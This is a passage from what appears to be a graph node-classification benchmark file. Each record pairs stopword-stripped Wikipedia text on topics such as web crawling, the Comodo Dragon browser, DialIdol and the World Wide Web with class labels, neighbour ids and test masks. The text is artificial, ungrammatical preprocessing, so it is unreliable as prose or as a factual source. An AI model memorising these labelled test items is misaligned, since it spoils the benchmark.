fraction contain relevant pages random sample web requires metric importance prioritizing web pages importance page function intrinsic quality popularity terms links visits even url latter case vertical search engines restricted single top-level domain search engines restricted fixed web site designing good selection policy added difficulty must work partial information complete set web pages known crawling junghoo cho et al made first study policies crawling scheduling data set 180,000-pages crawl stanford.edu domain crawling simulation done different strategies ordering metrics tested breadth-first backlink count partial pagerank calculations one conclusions crawler wants download pages high pagerank early crawling process partial pagerank strategy better followed breadth-first backlink-count however results single domain cho also wrote ph.d. dissertation stanford web crawling najork wiener performed actual crawl 328 million pages using breadth-first ordering found breadth-first crawl captures pages high pagerank early crawl compare strategy strategies explanation given authors result important pages many links numerous hosts links found early regardless host page crawl originates abiteboul designed crawling strategy based algorithm called opic on-line page importance computation opic page given initial sum cash distributed equally among pages points similar pagerank computation faster done one step opic-driven crawler downloads first pages crawling frontier higher amounts cash experiments carried 100,000-pages synthetic graph power-law distribution in-links however comparison strategies experiments real web boldi et al used simulation subsets web 40 million pages .it domain 100 million pages webbase crawl testing breadth-first depth-first random ordering omniscient strategy comparison based well pagerank computed partial crawl approximates true pagerank value surprisingly visits accumulate pagerank quickly notably breadth-first omniscient visit provide poor progressive approximations baeza-yates et al used simulation two subsets web 3 million pages .gr .cl domain testing several crawling strategies showed opic strategy strategy uses length per-site queues better breadth-first crawling also effective use previous crawl available guide current one daneshpajouh et al designed community based algorithm discovering good seeds method crawls web pages high pagerank different communities less iteration comparison crawl starting random seeds one extract good seed previously-crawled-web graph using new method using seeds new crawl effective crawler may want seek html pages avoid mime types order request html resources crawler may make http head request determine web resource mime type requesting entire resource get request avoid making numerous head requests crawler may examine url request resource url ends certain characters .html .htm .asp .aspx .php .jsp .jspx slash strategy may cause numerous html web resources unintentionally skipped crawlers may also avoid requesting resources dynamically produced order avoid spider traps may cause crawler download infinite number urls web site strategy unreliable site uses url rewriting simplify urls crawlers usually perform type url normalization order avoid crawling resource term url normalization also called url canonicalization refers process modifying standardizing url consistent manner several types normalization may performed including conversion urls lowercase removal .. segments adding trailing slashes non-empty path component crawlers intend download/upload many resources possible particular web site path-ascending crawler introduced would ascend every path url intends crawl example given seed url nowiki http //llama.org/hamster/monkey/page.html /nowiki attempt crawl /hamster/monkey/ /hamster/ cothey found path-ascending crawler effective finding isolated resources resources inbound link would found regular crawling importance page crawler also expressed function similarity page given query web crawlers attempt download pages similar called focused crawler topical crawlers concepts topical focused crawling first introduced filippo menczer soumen chakrabarti et al main problem focused crawling context web crawler would like able predict similarity text given page query actually downloading page possible predictor anchor text links approach taken pinkerton first web crawler early days web diligenti et al propose using complete content pages already visited infer similarity driving query pages visited yet performance focused crawling depends mostly richness links specific topic searched focused crawling usually relies general web search engine providing starting points example focused crawlers academic crawlers crawls free-access academic related documents citeseerxbot crawler citeseer search engine academic search engines google scholar microsoft academic search etc academic papers published pdf formats kind crawler particularly interested crawling pdf postscript files microsoft word including zipped formats general open source crawlers heritrix must customized filter mime types middleware used extract documents import focused crawl database repository identifying whether documents academic challenging add significant overhead crawling process performed post crawling process using machine learning regular expression algorithms academic documents usually obtained home pages faculties students publication page research institutes academic documents takes small fraction entire web pages good seed selection important boosting efficiencies web crawlers academic crawlers may download plain text html files contains metadata academic papers titles papers abstracts increases overall number papers significant fraction may provide free pdf downloads another type focused crawlers semantic focused crawler makes use domain ontologies represent topical maps link web pages relevant ontological concepts selection categorization purposes addition ontologies automatically updated crawling process dong et al introduced ontology-learning-based crawler using support vector machine update content ontological concepts crawling web pages web dynamic nature crawling fraction web take weeks months time web crawler finished crawl many events could happened including creations updates deletions search engine point view cost associated detecting event thus outdated copy resource most-used cost functions freshness age freshness binary measure indicates whether local copy accurate freshness page p repository time defined age measure indicates outdated local copy age page p repository time defined coffman et al worked definition objective web crawler equivalent freshness use different wording propose crawler must minimize fraction time pages remain outdated also noted problem web crawling modeled multiple-queue single-server polling system web crawler server web sites queues page modifications arrival customers switch-over times interval page accesses single web site model mean waiting time customer polling system equivalent average age web crawler objective crawler keep average freshness pages collection high possible keep average age pages low possible objectives equivalent first case crawler concerned many pages out-dated second case crawler concerned old local copies pages two simple re-visiting policies studied cho garcia-molina cases repeated crawling order pages done either random fixed order cho garcia-molina proved surprising result terms average freshness uniform policy outperforms proportional policy simulated web real web crawl intuitively reasoning web crawlers limit many pages crawl given time frame 1 allocate many new crawls rapidly changing pages expense less frequently updating pages 2 freshness rapidly changing pages lasts shorter period less frequently changing pages words proportional policy allocates resources crawling frequently updating pages experiences less overall freshness time improve freshness crawler penalize elements change often optimal re-visiting policy neither uniform policy proportional policy optimal method keeping average freshness high includes ignoring pages change often optimal keeping average age low use access frequencies monotonically sub-linearly increase rate change page cases optimal closer uniform policy proportional policy coffman et al note order minimize expected obsolescence time accesses particular page kept evenly spaced possible explicit formulas re-visit policy attainable general obtained numerically depend distribution page changes cho garcia-molina show exponential distribution good fit describing page changes ipeirotis et al show use statistical tools discover parameters affect distribution note re-visiting policies considered regard pages homogeneous terms quality pages web worth something realistic scenario information web page quality included achieve better crawling policy crawlers retrieve data much quicker greater depth human searchers crippling impact performance site needless say single crawler performing multiple requests per second and/or downloading large files server would hard time keeping requests multiple crawlers noted koster use web crawlers useful number tasks comes price general community costs using web crawlers include partial solution problems robots exclusion protocol also known robots.txt protocol standard administrators indicate parts web servers accessed crawlers standard include suggestion interval visits server even though interval effective way avoiding server overload recently commercial search engines like google ask jeeves msn yahoo search able use extra crawl-delay parameter robots.txt file indicate number seconds delay requests first proposed interval successive pageloads 60 seconds however pages downloaded rate website 100,000 pages perfect connection zero latency infinite bandwidth would take 2 months download entire web site also fraction resources web server would used seem acceptable cho uses 10 seconds interval accesses wire crawler uses 15 seconds default mercatorweb crawler follows adaptive politeness policy took seconds download document given server crawler waits 10 seconds downloading next page dill et al use 1 second using web crawlers research purposes detailed cost-benefit analysis needed ethical considerations taken account deciding crawl fast crawl anecdotal evidence access logs shows access intervals known crawlers vary 20 seconds 3–4 minutes worth noticing even polite taking safeguards avoid overloading web servers complaints web server administrators received brin page note ... running crawler connects half million servers ... generates fair amount e-mail phone calls vast number people coming line always know crawler first one seen parallel crawler crawler runs multiple processes parallel goal maximize download rate minimizing overhead parallelization avoid repeated downloads page avoid downloading page crawling system requires policy assigning new urls discovered crawling process url found two different crawling processes crawler must good crawling strategy noted previous sections also highly optimized architecture shkapenyuk suel noted web crawlers central part search engines details algorithms architecture kept business secrets crawler designs published often important lack detail prevents others reproducing work also emerging concerns search engine spamming prevent major search engines publishing ranking algorithms website owners keen pages indexed broadly possible strong presence search engines web crawling also unintended consequences lead compromise data breach search engine indexes resources n't publicly available pages revealing potentially vulnerable versions software apart standard web application security recommendations website owners reduce exposure opportunistic hacking allowing search engines index public parts websites robots.txt explicitly blocking indexing transactional parts login pages private pages etc. web crawlers typically identify web server using user-agent field http request web site administrators typically examine web servers log use user agent field determine crawlers visited web server often user agent field may include url web site administrator may find information crawler examining web server log tedious task therefore administrators use tools identify track verify web crawlers spambots malicious web crawlers unlikely place identifying information user agent field may mask identity browser well-known crawler important web crawlers identify web site administrators contact owner needed cases crawlers may accidentally trapped crawler trap may overloading web server requests owner needs stop crawler identification also useful administrators interested knowing may expect web pages indexed particular search engine vast amount web pages lie deep invisible web pages typically accessible submitting queries database regular crawlers unable find pages links point google sitemaps protocol mod oai intended allow discovery deep-web resources deep web crawling also multiplies number web links crawled crawlers take urls codice_1 form cases googlebot web crawling done text contained inside hypertext content tags text strategic approaches may taken target deep web content technique called screen scraping specialized software may customized automatically repeatedly query given web form intention aggregating resulting data software used span multiple web forms across multiple websites data extracted results one web form submission taken applied input another web form thus establishing continuity across deep web way possible traditional web crawlers pages built ajax among causing problems web crawlers google proposed format ajax calls bot recognize index recent study based large scale analysis robots.txt files showed certain web crawlers preferred others googlebot preferred web crawler number visual web scraper/crawler products available web crawl pages structure data columns rows based users requirements one main difference classic visual crawler level programming ability required set crawler latest generation visual scrapers like diffbot outwithub import.io remove majority programming skill needed able program start crawl scrape web data visual scraping/crawling method relies user teaching piece crawler technology follows patterns semi-structured data sources dominant method teaching visual crawler highlighting data browser training columns rows technology new example basis needlebase bought google part larger acquisition ita labs continued growth investment area investors end-users following list published crawler architectures general-purpose crawlers excluding focused web crawlers brief description includes names given different components outstanding features",
    "neighbors": [
      2566,
      8718,
      3604,
      11284,
      5150,
      8735,
      10791,
      5677,
      6701,
      7737,
      10815,
      8769,
      10313,
      9293,
      5214,
      7276,
      113,
      119,
      3191,
      7807,
      140,
      7837,
      3744,
      6331,
      4797,
      714,
      6346,
      7370,
      10452,
      1240,
      8408,
      735,
      225,
      1251,
      7926,
      8440,
      10492,
      1802,
      6922,
      2318,
      5904,
      7453,
      3875,
      7982,
      10033,
      6458,
      7482,
      10579,
      4962,
      4967,
      8554,
      7022,
      8046,
      882,
      5492,
      9588,
      8568,
      4473,
      1913,
      3979,
      6545,
      5012,
      1944,
      2459,
      5532,
      2470,
      944,
      6576,
      10160,
      8627,
      8628,
      8122,
      4031,
      8639,
      8644,
      10724,
      7656,
      7673,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 114,
    "label": 0,
    "text": "Lexical_density:lexical density lexical density concept computational linguistics measures structure complexity human communication language lexical density estimates linguistic complexity written spoken composition functional words grammatical units content words lexical units lexemes one method calculate lexical density compute ratio lexical items total number words another method compute ratio lexical items number higher structural items composition total number clauses sentences lexical density individual evolves age education communication style circumstances unusual injuries medical condition creativity inherent structure human language one first language may impact lexical density individual writing speaking style human communication written form generally lexically dense spoken form early childhood stage lexical density impacts readability composition ease listener reader comprehend communication lexical density may also impact memorability retention sentence message lexical density proportion content words lexical items given discourse measured either ratio lexical items total number words ratio lexical items number higher structural items sentences example clauses lexical item typically real content includes nouns verbs adjectives adverbs grammatical item typically functional glue thread weaves content includes pronouns conjunctions prepositions determiners certain classes finite verbs adverbs lexical density one methods used discourse analysis descriptive parameter varies register genre many proposed methods computing lexical density composition corpus lexical density may determined ure proposed following formula 1971 compute lexical density sentence biber terms ratio type-token ratio 1985 halliday revised denominator ure formula proposed following compute lexical density sentence formulations halliday proposed lexical density computed simple ratio without 100 multiplier lexical density measurements may vary composition depending lexical item defined items classified lexical grammatical item adopted methodology consistently applied across various compositions provides lexical density compositions typically lexical density written composition higher spoken composition according ure written forms human communication english language typically lexical densities 40 spoken forms tend lexical densities 40 survey historical texts michael stubbs typical lexical density fictional literature ranged 40 54 non-fiction ranged 40 65 percent relation intimacy participants particular communication impact lexical density states ure circumstances prior start communication speaker writer higher lexical density written forms communication proposed primarily written forms human communication involve greater preparation reflection revisions human discussions conversations involving anticipating feedback tend sparser lower lexical density contrast state stubbs biber instructions law enforcement orders news read screen prompts within alloted time literature authors expect available reader re-reading tend maximize lexical density surveys lexical density spoken written materials across different european countries age groups johansson strömqvist report lexical density population groups similar depended morphological structure native language within country age groups sampled lexical density highest adults variations estimated lexical diversity states johansson higher teenagers age group 13-year olds 17-year olds",
    "neighbors": [
      1890
    ],
    "mask": "Test"
  },
  {
    "node_id": 115,
    "label": 7,
    "text": "Comodo_Dragon:comodo dragon comodo dragon freeware web browser based chromium produced comodo group sporting similar interface google chrome dragon implement chrome user tracking potentially privacy-compromising features substituting user tracking implementations provides additional security measures indicating authenticity relative strength website ssl certificate upon installation comodo dragon offers opportunity configure either comodo dragon user entire computer use comodo dns servers instead user internet service provider comodo dragon performs additional checks ssl digital certificates secure websites informs users site certificate may insufficient strength includes on-demand site inspector designed determine site hosts malicious code instead google updater comodo dragon features built-in updater dragon uninstalled users given option keeping dragon cache cookie files deleting addition following google chrome features removed disabled dragon google engineer publicly disclosed serious security vulnerability comodo dragon comodo failed respond issue within 90 days google provides software vendors advisory warns users install comodo dragon dragon replaces default browser hijacks dns settings disables same-origin policy exposes users allowing malicious websites access private data comodo first attempt patch issue shown ineffective comodo subsequently claimed problems fixed comodo tracks user time spent using browser operating system browser inquiries certificate revocation reveal sites visited users opt whether also track activity use detail comodo partners use cookies google analytics comodo may disclose data affiliates business partners established similar privacy standards privacy statement says california ip address considered personal information comodo creates log files track users identifiable cookie browser features ip address outside california comodo uses log files non-personally identifiable information ... track movements throughout site ... gather broad demographic information aggregate use browser supported ads relate content information part product queries made product include many software products license license common terms complying subpoenas interception orders reverse engineering copying sub-licensing disclaiming warranties liability license also requires disputes settled arbitration new jersey users must give accurate registration information pay comodo costs directly indirectly based breach agreement information provided infringement rights third party",
    "neighbors": [
      513,
      6657,
      9736,
      9744,
      2579,
      6171,
      9757,
      7713,
      550,
      10791,
      9770,
      10284,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      3163,
      6747,
      106,
      1642,
      9834,
      9841,
      9843,
      4728,
      637,
      1664,
      2182,
      6797,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      5380,
      7943,
      278,
      7965,
      1834,
      7983,
      9523,
      2887,
      10057,
      11082,
      2893,
      3941,
      8557,
      6528,
      3971,
      3462,
      8584,
      7572,
      5026,
      5543,
      8615,
      944,
      8627,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      9712,
      6133,
      5622,
      5114
    ],
    "mask": "None"
  },
  {
    "node_id": 116,
    "label": 0,
    "text": "Minimal_recursion_semantics:minimal recursion semantics minimal recursion semantics mrs framework computational semantics implemented typed feature structure formalisms head-driven phrase structure grammar lexical functional grammar suitable computational language parsing natural language generation mrs enables simple formulation grammatical constraints lexical phrasal semantics including principles semantic composition technique used machine translation early pioneers mrs include ann copestake dan flickinger carl pollard ivan sag",
    "neighbors": [
      2440,
      1737,
      7164,
      5399
    ],
    "mask": "None"
  },
  {
    "node_id": 117,
    "label": 5,
    "text": "DialIdol:dialidol dialidol name computer program microsoft windows associated website tracks voting trends american idol contestants program allows users automatically vote american idol contestants choice using pc modem program reports back main website keeps track results based percentage calls contestant result busy signal dialidol assumes busy signals means callers attempting vote contestant dialidol created fourth season american idol released public start fifth season users choose vote equally chosen contestants choose keep certain contestants safe voting chosen contestant ranked lowest choose keep certain contestants unsafe voting lowest-ranked contestant list addition american idol software website may also used vote well track voting trends dancing stars think dance x factor 2006 dialidol also supported celebrity duets canadian idol dialidol support think dance season 8 march 2006 dialidol received cease desist order fox alleged copyright infringement according site creator jim hellriegel fox lawyers also told site acting potential spoiler claimed posted results site taken temporarily consulting lawyers determining legal web site redesigned logo cosmetic changes put back online dialidol take text messages account problems measuring busy signals exists margin error contestant score often 50 contestants predicted danger voted dialidol make prediction case final 3 season 6 melinda doolittle eliminated finale season 8 kris allen also dialidol criticized impreciseness ranking contestants however program creator asserted dialidol never designed get results slot slot right stresses dialidol entertainment purposes according american idol producers monitors place identify remove power dialers use technical enhancements phone systems allow multiple votes dialidol power dialer according fox spokeswoman jennifer sprague using modem dialer ‘ power dialing person manually using redial button standard telephone generate many call attempts modem dialer ”",
    "neighbors": [
      1121,
      5281,
      6797,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 118,
    "label": 7,
    "text": "Single_system_image:single system image distributed computing single system image ssi cluster cluster machines appears one single system concept often considered synonymous distributed operating system single image may presented limited purposes job scheduling instance may achieved means additional layer software conventional operating system images running node interest ssi clusters based perception may simpler use administer specialized clusters different ssi systems may provide less complete illusion single system different ssi systems may depending intended usage provide subset features many ssi systems provide process migration processes may start one node moved another node possibly resource balancing administrative reasons processes moved one node another associated resources example ipc resources may moved ssi systems allow checkpointing running processes allowing current state saved reloaded later date checkpointing seen related migration migrating process one node another implemented first checkpointing process restarting another node alternatively checkpointing considered migration disk ssi systems provide illusion processes running machine process management tools e.g ps kill unix like systems operate processes cluster ssi systems provide single view file system may achieved simple nfs server shared disk devices even file replication advantage single root view processes may run available node access needed files special precautions cluster implements process migration single root view enables direct accesses files node process currently running ssi systems provide way breaking illusion node-specific files even single root hp trucluster provides context dependent symbolic link cdsl points different files depending node accesses hp vmscluster provides search list logical name node specific files occluding cluster shared files necessary capability may necessary deal heterogeneous clusters nodes configuration complex configurations multiple nodes multiple architectures multiple sites several local disks may combine form logical single root ssi systems allow nodes access i/o devices e.g tapes disks serial lines nodes may restrictions kinds accesses allowed example openssi ca n't mount disk devices one node another node ssi systems allow processes different nodes communicate using inter-process communications mechanisms running machine ssi systems even include shared memory emulated software distributed shared memory cases inter-node ipc slower ipc machine possibly drastically slower shared memory ssi clusters include special hardware reduce slowdown ssi systems provide cluster address single address visible outside cluster used contact cluster one machine used load balancing inbound calls cluster directing lightly loaded nodes redundancy moving cluster address one machine another nodes join leave cluster examples vary commercial platforms scaling capabilities packages/frameworks creating distributed systems well actually implement single system image",
    "neighbors": [
      1795,
      7812,
      4616,
      5384,
      8725,
      3487,
      8992,
      2986,
      7983,
      7733,
      823,
      8514,
      8901,
      5452,
      2264,
      3801,
      2394,
      7649,
      10733,
      11501,
      5492,
      3066,
      3323,
      3326,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 119,
    "label": 8,
    "text": "World_Wide_Web:world wide web world wide web www commonly known web information system documents web resources identified uniform resource locators urls nowiki https //www.example.com/ /nowiki may interlinked hypertext accessible internet resources www may accessed users software application called web browser english scientist tim berners-lee invented world wide web 1989 wrote first web browser 1990 employed cern near geneva switzerland browser released outside cern 1991 first research institutions starting january 1991 general public august 1991 world wide web central development information age primary tool billions people use interact internet web resources may type downloaded media web pages hypertext media formatted hypertext markup language html formatting allows embedded hyperlinks contain urls permit users navigate web resources addition text web pages may contain images video audio software components rendered user web browser coherent pages multimedia content multiple web resources common theme common domain name make website websites stored computers running program called web server responds requests made internet web browsers running user computer website content largely provided publisher interactively users contribute content content depends upon users actions websites may provided myriad informative entertainment commercial governmental non-governmental reasons tim berners-lee vision global hyperlinked information system became possibility second half 1980s 1985 global internet began proliferate europe domain name system upon uniform resource locator built came 1988 first direct ip connection europe north america made berners-lee began openly discuss possibility web-like system cern working cern berners-lee became frustrated inefficiencies difficulties posed finding information stored different computers march 12 1989 submitted memorandum titled information management proposal management cern system called mesh referenced enquire database software project built 1980 used term web described elaborate information management system based links embedded text imagine references document associated network address thing referred reading document could skip click mouse system explained could referred using one existing meanings word hypertext term says coined 1950s reason proposal continues hypertext links could encompass multimedia documents including graphics speech video berners-lee goes use term hypermedia help colleague fellow hypertext enthusiast robert cailliau published formal proposal 12 november 1990 build hypertext project called worldwideweb one word web hypertext documents viewed browsers using client–server architecture point html http already development two months first web server month completing first successful test proposal estimated read-only web would developed within three months would take six months achieve creation new links new material readers authorship becomes universal well automatic notification reader new material interest him/her become available read-only goal met accessible authorship web content took longer mature wiki concept webdav blogs web 2.0 rss/atom proposal modelled sgml reader dynatext electronic book technology spin-off institute research information scholarship brown university dynatext system licensed cern key player extension sgml iso 8879:1986 hypermedia within hytime considered expensive inappropriate licensing policy use general high energy physics community namely fee document document alteration next computer used berners-lee world first web server also write first web browser worldwideweb 1990 christmas 1990 berners-lee built tools necessary working web first web browser web editor well first web server first web site described project published 20 december 1990 first web page may lost paul jones unc-chapel hill north carolina announced may 2013 berners-lee gave says oldest known web page 1991 visit unc jones stored magneto-optical drive next computer 6 august 1991 berners-lee published short summary world wide web project newsgroup alt.hypertext date sometimes confused public availability first web servers occurred months earlier another example confusion several news media reported first photo web published berners-lee 1992 image cern house band les horribles cernettes taken silvano de gennaro gennaro disclaimed story writing media totally distorting words sake cheap sensationalism first server outside europe installed stanford linear accelerator center slac palo alto california host spires-hep database accounts differ substantially date event world wide web consortium timeline says december 1992 whereas slac claims december 1991 w3c document titled little history world wide web underlying concept hypertext originated previous projects 1960s hypertext editing system hes brown university ted nelson project xanadu douglas engelbart on-line system nls nelson engelbart turn inspired vannevar bush microfilm-based memex described 1945 essay may think berners-lee breakthrough marry hypertext internet book explains repeatedly suggested marriage two technologies possible members technical communities one took invitation finally assumed project process developed three essential technologies world wide web several differences hypertext systems available time web required unidirectional links rather bidirectional ones making possible someone link another resource without action owner resource also significantly reduced difficulty implementing web servers browsers comparison earlier systems turn presented chronic problem link rot unlike predecessors hypercard world wide web non-proprietary making possible develop servers clients independently add extensions without licensing restrictions 30 april 1993 cern announced world wide web would free anyone fees due coming two months announcement server implementation gopher protocol longer free use produced rapid shift away gopher towards web early popular web browser violawww unix x window system scholars generally agree turning point world wide web began introduction mosaic web browser 1993 graphical browser developed team national center supercomputing applications university illinois urbana–champaign ncsa-uiuc led marc andreessen funding mosaic came us high-performance computing communications initiative high performance computing act 1991 one several computing developments initiated us senator al gore prior release mosaic graphics commonly mixed text web pages web popularity less older protocols use internet gopher wide area information servers wais mosaic graphical user interface allowed web become far popular internet protocol world wide web consortium w3c founded tim berners-lee left european organization nuclear research cern october 1994 founded massachusetts institute technology laboratory computer science mit/lcs support defense advanced research projects agency darpa pioneered internet year later second site founded inria french national computer research lab support european commission dg infso 1996 third continental site created japan keio university end 1994 total number websites still relatively small many notable websites already active foreshadowed inspired today popular services connected internet websites created around world motivated international standards development protocols formatting berners-lee continued stay involved guiding development web standards markup languages compose web pages advocated vision semantic web world wide web enabled spread information internet easy-to-use flexible format thus played important role popularising use internet although two terms sometimes conflated popular use world wide web synonymous internet web information space containing hyperlinked documents resources identified uris implemented client server software using internet protocols tcp/ip http berners-lee knighted 2004 queen elizabeth ii services global development internet never patented invention terms internet world wide web often used without much distinction however two terms mean thing internet global system interconnected computer networks contrast world wide web global collection documents resources linked hyperlinks uris web resources accessed using http https application-level internet protocols use internet transport protocols viewing web page world wide web normally begins either typing url page web browser following hyperlink page resource web browser initiates series background communication messages fetch display requested page 1990s using browser view web pages—and move one web page another hyperlinks—came known 'browsing 'web surfing channel surfing 'navigating web early studies new behaviour investigated user patterns using web browsers one study example found five user patterns exploratory surfing window surfing evolved surfing bounded navigation targeted navigation following example demonstrates functioning web browser accessing page url codice_1 browser resolves server name url codice_2 internet protocol address using globally distributed domain name system dns lookup returns ip address 203.0.113.4 2001 db8:2e :7334 browser requests resource sending http request across internet computer address requests service specific tcp port number well known http service receiving host distinguish http request network protocols may servicing http protocol normally uses port number 80 https protocol normally port number 443 content http request simple two lines text computer receiving http request delivers web server software listening requests port 80 web server fulfil request sends http response back browser indicating success followed content requested page hypertext markup language html basic web page might look like web browser parses html interprets markup paragraph surrounds words format text screen many web pages use html reference urls resources images embedded media scripts affect page behaviour cascading style sheets affect page layout browser makes additional http requests web server internet media types receives content web server browser progressively renders page onto screen specified html additional resources hypertext markup language html standard markup language creating web pages web applications cascading style sheets css javascript forms triad cornerstone technologies world wide web web browsers receive html documents web server local storage render documents multimedia web pages html describes structure web page semantically originally included cues appearance document html elements building blocks html pages html constructs images objects interactive forms may embedded rendered page html provides means create structured documents denoting structural semantics text headings paragraphs lists links quotes items html elements delineated tags written using angle brackets tags directly introduce content page tags surround provide information document text may include tags sub-elements browsers display html tags use interpret content page html embed programs written scripting language javascript affects behavior content web pages inclusion css defines look layout content world wide web consortium w3c maintainer html css standards encouraged use css explicit presentational html web pages contain hyperlinks related pages perhaps downloadable files source documents definitions web resources underlying html hyperlink looks like collection useful related resources interconnected via hypertext links dubbed web information publication internet created tim berners-lee first called worldwideweb original camelcase subsequently discarded november 1990 hyperlink structure www described webgraph nodes web graph correspond web pages urls directed edges hyperlinks time many web resources pointed hyperlinks disappear relocate replaced different content makes hyperlinks obsolete phenomenon referred circles link rot hyperlinks affected often called dead links ephemeral nature web prompted many efforts archive web sites internet archive active since 1996 best known efforts many hostnames used world wide web begin www long-standing practice naming internet hosts according services provide hostname web server often www way may ftp ftp server news nntp usenet news server host names appear domain name system dns subdomain names www.example.com use www required technical policy standard many web sites use first web server nxoc01.cern.ch according paolo palazzi worked cern along tim berners-lee popular use www subdomain accidental world wide web project page intended published www.cern.ch info.cern.ch intended cern home page however dns records never switched practice prepending www institution website domain name subsequently copied many established websites still use prefix employ subdomain names www2 secure en special purposes many web servers set main domain name e.g. example.com www subdomain e.g. www.example.com refer site others require one form may map different web sites use subdomain name useful load balancing incoming web traffic creating cname record points cluster web servers since currently subdomain used cname result achieved using bare domain root user submits incomplete domain name web browser address bar input field web browsers automatically try adding prefix www beginning possibly .com .org .net end depending might missing example entering may transformed nowiki http //www.microsoft.com/ /nowiki 'openoffice nowiki http //www.openoffice.org /nowiki feature started appearing early versions firefox still working title 'firebird early 2003 earlier practice browsers lynx reported microsoft granted us patent idea 2008 mobile devices english www usually read double-u double-u double-u users pronounce dub-dub-dub particularly new zealand stephen fry podgrams series podcasts pronounces wuh wuh wuh english writer douglas adams quipped independent sunday 1999 world wide web thing know whose shortened form takes three times longer say short mandarin chinese world wide web commonly translated via phono-semantic matching wàn wéi wǎng satisfies www literally means myriad dimensional net translation reflects design concept proliferation world wide web tim berners-lee web-space states world wide web officially spelled three separate words capitalised intervening hyphens use www prefix declining especially web 2.0 web applications sought brand domain names make easily pronounceable mobile web grew popularity services like gmail.com outlook.com myspace.com facebook.com twitter.com often mentioned without adding www indeed .com domain scheme specifiers codice_3 codice_4 start web uri refer hypertext transfer protocol http secure respectively specify communication protocol use request response http protocol fundamental operation world wide web added encryption layer https essential browsers send retrieve confidential data passwords banking information web browsers usually automatically prepend nowiki http // /nowiki user-entered uris omitted web page also written webpage document suitable world wide web web browsers web browser displays web page monitor mobile device term web page usually refers visible may also refer contents computer file usually text file containing hypertext written html comparable markup language typical web pages provide hypertext browsing web pages via hyperlinks often referred links web browsers frequently access multiple web resource elements reading style sheets scripts images presenting web page network web browser retrieve web page remote web server web server may restrict access private network corporate intranet web browser uses hypertext transfer protocol http make requests web server static web page delivered exactly stored web content web server file system contrast dynamic web page generated web application usually driven server-side software dynamic web pages help browser client enhance web page user input server static web page sometimes called flat page/stationary page web page delivered user exactly stored contrast dynamic web pages generated web application consequently static web page displays information users contexts subject modern capabilities web server negotiate content-type language document versions available server configured server-side dynamic web page web page whose construction controlled application server processing server-side scripts server-side scripting parameters determine assembly every new web page proceeds including setting client-side processing client-side dynamic web page processes web page using html scripting running browser loads javascript scripting languages determine way html received page parsed document object model dom represents loaded web page client-side techniques dynamically update change dom way dynamic web page reloaded user computer program change variable content updating information could come server changes made page dom may may truncate browsing history create saved version go back dynamic web page update using ajax technologies neither create page go back truncate web browsing history forward displayed page using ajax technologies end user gets one dynamic page managed single page web browser actual web content rendered page vary ajax engine sits browser requesting parts dom dom client application server dhtml umbrella term technologies methods used create web pages static web pages though fallen common use since popularization ajax term rarely used client-side-scripting server-side scripting combination make dynamic web experience browser javascript scripting language initially developed 1995 brendan eich netscape use within web pages standardised version ecmascript make web pages interactive web applications also use javascript techniques ajax asynchronous javascript xml client-side script delivered page make additional http requests server either response user actions mouse movements clicks based elapsed time server responses used modify current page rather creating new page response server needs provide limited incremental information multiple ajax requests handled time users interact page data retrieved web pages may also regularly poll server check whether new information available website collection related web resources including web pages multimedia content typically identified common domain name published least one web server notable examples wikipedia.org google.com amazon.com website may accessible via public internet protocol ip network internet private local area network lan referencing uniform resource locator url identifies site websites many functions used various fashions website personal website corporate website company government website organization website etc websites typically dedicated particular topic purpose ranging entertainment social networking providing news education publicly accessible websites collectively constitute world wide web private websites company website employees typically part intranet web pages building blocks websites documents typically composed plain text interspersed formatting instructions hypertext markup language html xhtml may incorporate elements websites suitable markup anchors web pages accessed transported hypertext transfer protocol http may optionally employ encryption http secure https provide security privacy user user application often web browser renders page content according html markup instructions onto display terminal hyperlinking web pages conveys reader site structure guides navigation site often starts home page containing directory site web content websites require user registration subscription access content examples subscription websites include many business sites news websites academic journal websites gaming websites file-sharing websites message boards web-based email social networking websites websites providing real-time stock market data well sites providing various services end users access websites range devices including desktop laptop computers tablet computers smartphones smart tvs web browser commonly referred browser software user agent accessing information world wide web connect website server display pages user needs web browser program program user runs download format display web page user computer addition allowing users find displaying moving web pages web browser usually features like keeping bookmarks recording history managing cookies see home pages may facilities recording passwords logging web sites popular browsers chrome firefox safari internet explorer edge web server server software hardware dedicated running said software satisfy world wide web client requests web server general contain one websites web server processes incoming network requests http several related protocols primary function web server store process deliver web pages clients communication client server takes place using hypertext transfer protocol http pages delivered frequently html documents may include images style sheets scripts addition text content user agent commonly web browser web crawler initiates communication making request specific resource using http server responds content resource error message unable resource typically real file server secondary storage necessarily case depends web server implemented primary function serve content full implementation http also includes ways receiving content clients feature used submitting web forms including uploading files many generic web servers also support server-side scripting using active server pages asp php hypertext preprocessor scripting languages means behaviour web server scripted separate files actual server software remains unchanged usually function used generate html documents dynamically on-the-fly opposed returning static documents former primarily used retrieving modifying information databases latter typically much faster easily cached deliver dynamic content web servers also frequently found embedded devices printers routers webcams serving local network web server may used part system monitoring administering device question usually means additional software installed client computer since web browser required included operating systems http cookie also called web cookie internet cookie browser cookie simply cookie small piece data sent website stored user computer user web browser user browsing cookies designed reliable mechanism websites remember stateful information items added shopping cart online store record user browsing activity including clicking particular buttons logging recording pages visited past also used remember arbitrary pieces information user previously entered form fields names addresses passwords credit card numbers cookies perform essential functions modern web perhaps importantly authentication cookies common method used web servers know whether user logged account logged without mechanism site would know whether send page containing sensitive information require user authenticate logging security authentication cookie generally depends security issuing website user web browser whether cookie data encrypted security vulnerabilities may allow cookie data read hacker used gain access user data used gain access user credentials website cookie belongs see cross-site scripting cross-site request forgery examples tracking cookies especially third-party tracking cookies commonly used ways compile long-term records individuals browsing histories potential privacy concern prompted european u.s. lawmakers take action 2011 european law requires websites targeting european union member states gain informed consent users storing non-essential cookies device google project zero researcher jann horn describes ways cookies read intermediaries like wi-fi hotspot providers recommends use browser incognito mode circumstances web search engine internet search engine software system designed carry web search internet search means search world wide web systematic way particular information specified web search query search results generally presented line results often referred search engine results pages serps information may mix web pages images videos infographics articles research papers types files search engines also mine data available databases open directories unlike web directories maintained 